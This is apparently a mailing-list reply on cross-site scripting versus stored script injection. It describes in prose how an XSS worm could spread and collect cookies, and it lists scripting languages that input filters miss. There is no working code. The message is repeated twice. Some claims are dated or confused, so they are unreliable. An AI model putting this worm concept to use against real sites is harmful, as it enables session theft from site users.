>Yep, there are a lot of interesting games that can be played with XSS.
>The sky is the limit. Here are some that I know about: grab people's
>email address who visit a Web site, create an email worm, order stuff
>from an eCommerce site, post fake news stories at Web sites, etc.
>However, my feeling is that XSS bugs haven't been exploited in the wild.
>Instead people have just put together interesting demos. If anyone can
>point me to any press articles where XSS might have been used, that
>would be great.
>Richard
I've exploited XSS holes many times. I have heard/seen people attempt XSS
exploitation many times. It is a much more targeted and specific type of
attack than one which the attack has full power to exploit, this may be a
reason behind it's limited use. I'd say script injection attacks are more
damaging, and exploited much more frequently than XSS.
Instead of that fake news story being up for 1 user, and only if that user
is sent to the webapp with XSS payload, the fake story would be up for
everyuser.
It is impossible to create an email worm with XSS, since the file is stored
on the server it is a script injection type of attack. XSS works by input
being echoed back to the user. Script injection is when this input is saved
perminately to a file, database, etc and then presented to the user at a
later time. This makes for a more perminate attack, one that is much more
likely to work. One "worm" which would work would be a normal XSS worm that
chains their urls together, perhaps querying a database for all of the urls
to hit (or hardcode it in). This could spread from site to site gaining
cookies, urls, and other important info. It could even spread from user to
user if the XSS can send instant messages or force other users to visit html
pages somehow (not via email, again, that is script injection).
On a related note, please remember that XSS/script injection is not just
javascript. Other languages have their own benifits. If you are just
filtering for javascript, best to add these other languages (or use a
completely different system for input varification): ActiveX (OLE), VBscript
(OpenScape), CSS, Shockwave, Flash, Actionscript, mocha (netscape's
javascript command line interpreter), livescript (orignal name of
javascript), Java, tcltk (http://dev.scriptics.com/software/plugin/),
ACUCOBOL-GT (http://www.actis.gr/prod/acucobol/webplugin.htm), dolphin
(smalltalk
http://www.object-arts.com/Lib/EducationCentre4/htm/deployingfortheweb.h
tm),
Applescript, tml (http://browsex.com), and others I am unaware of. If you
know of any more please email them with url for more info on them.
_________________________________________________________________
Help STOP SPAM with the new MSN 8 and get 2 months FREE*
http://join.msn.com/?page=features/junkmail
>The sky is the limit. Here are some that I know about: grab people's
>email address who visit a Web site, create an email worm, order stuff
>from an eCommerce site, post fake news stories at Web sites, etc.
>However, my feeling is that XSS bugs haven't been exploited in the wild.
>Instead people have just put together interesting demos. If anyone can
>point me to any press articles where XSS might have been used, that
>would be great.
>Richard
I've exploited XSS holes many times. I have heard/seen people attempt XSS
exploitation many times. It is a much more targeted and specific type of
attack than one which the attack has full power to exploit, this may be a
reason behind it's limited use. I'd say script injection attacks are more
damaging, and exploited much more frequently than XSS.
Instead of that fake news story being up for 1 user, and only if that user
is sent to the webapp with XSS payload, the fake story would be up for
everyuser.
It is impossible to create an email worm with XSS, since the file is stored
on the server it is a script injection type of attack. XSS works by input
being echoed back to the user. Script injection is when this input is saved
perminately to a file, database, etc and then presented to the user at a
later time. This makes for a more perminate attack, one that is much more
likely to work. One "worm" which would work would be a normal XSS worm that
chains their urls together, perhaps querying a database for all of the urls
to hit (or hardcode it in). This could spread from site to site gaining
cookies, urls, and other important info. It could even spread from user to
user if the XSS can send instant messages or force other users to visit html
pages somehow (not via email, again, that is script injection).
On a related note, please remember that XSS/script injection is not just
javascript. Other languages have their own benifits. If you are just
filtering for javascript, best to add these other languages (or use a
completely different system for input varification): ActiveX (OLE), VBscript
(OpenScape), CSS, Shockwave, Flash, Actionscript, mocha (netscape's
javascript command line interpreter), livescript (orignal name of
javascript), Java, tcltk (http://dev.scriptics.com/software/plugin/),
ACUCOBOL-GT (http://www.actis.gr/prod/acucobol/webplugin.htm), dolphin
(smalltalk
http://www.object-arts.com/Lib/EducationCentre4/htm/deployingfortheweb.h
tm),
Applescript, tml (http://browsex.com), and others I am unaware of. If you
know of any more please email them with url for more info on them.
_________________________________________________________________
Help STOP SPAM with the new MSN 8 and get 2 months FREE*
http://join.msn.com/?page=features/junkmail
[ reply ]